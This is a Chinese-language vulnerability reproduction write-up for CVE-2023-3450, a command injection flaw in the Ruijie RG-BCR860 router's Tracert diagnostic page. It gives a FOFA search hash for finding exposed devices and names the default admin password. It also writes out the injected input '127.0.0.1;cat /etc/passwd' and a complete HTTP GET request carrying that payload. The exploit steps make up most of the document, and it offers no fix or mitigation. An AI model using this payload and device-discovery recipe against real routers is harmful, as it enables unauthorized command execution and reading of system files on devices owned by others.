# 锐捷RG-BCR860路由器命令执行漏洞（CVE-2023-3450）

# 一、漏洞简介
RG-BCR860是锐捷网络推出的一款商业云路由器，它是专为酒店、餐饮、门店设计，适用带宽100Mbps,带机量可达150台，支持Sec VPM、内置安全审计模块，给商家带来更好的网络营销体验 。该产品主支持全中文的WEB 界面配置，不再需要用传统的命令行进行配置，使得设备更加简单方便的进行维护和管理。RG-BCR860 2.5.13版本存在操作系统命令注入漏洞，该漏洞源于组件Network Diagnostic Page存在问题，会导致操作系统命令注入。

# 二、影响版本
+ 锐捷路由器RG-BCR860

# 三、资产测绘
+ fofa`icon_hash="-399311436"`

![1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745.png](./img/m9qo6lOTSwrcQIzK/1692606754994-2f1216a0-282b-45a6-94fc-b7f5dd405745-691021.png)

+ 登录页面

![1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6.png](./img/m9qo6lOTSwrcQIzK/1692606877528-52b592a6-ef53-44d7-8dbc-8ffe1299e9e6-740734.png)

# 四、漏洞复现
1. 该漏洞属于后台漏洞，需要登录后台（默认密码：admin）

![1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32.png](./img/m9qo6lOTSwrcQIzK/1692606937330-5391e9ce-3c7b-4c56-8529-034a3d1a2a32-877796.png)

2. 漏洞位置：网络诊断->Tracert检测->输入`127.0.0.1;cat /etc/passwd`

![1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694.png](./img/m9qo6lOTSwrcQIzK/1692607017024-349a76e0-e5a3-4a4a-83d1-acaa51b2c694-896230.png)

3. 数据包

```plain
GET /cgi-bin/luci/;stok=8bbbc7db8f9e3d2d972bd7ab13f21a75/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=20 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: sysauth=698164456dede213f8f15cebba269273
```

![1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20.png](./img/m9qo6lOTSwrcQIzK/1694586407185-44b0cbef-6fc5-4191-be0e-3cebec716a20-599627.png)



> 更新: 2024-06-24 11:42:27  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iodb45mpku6ufxa5>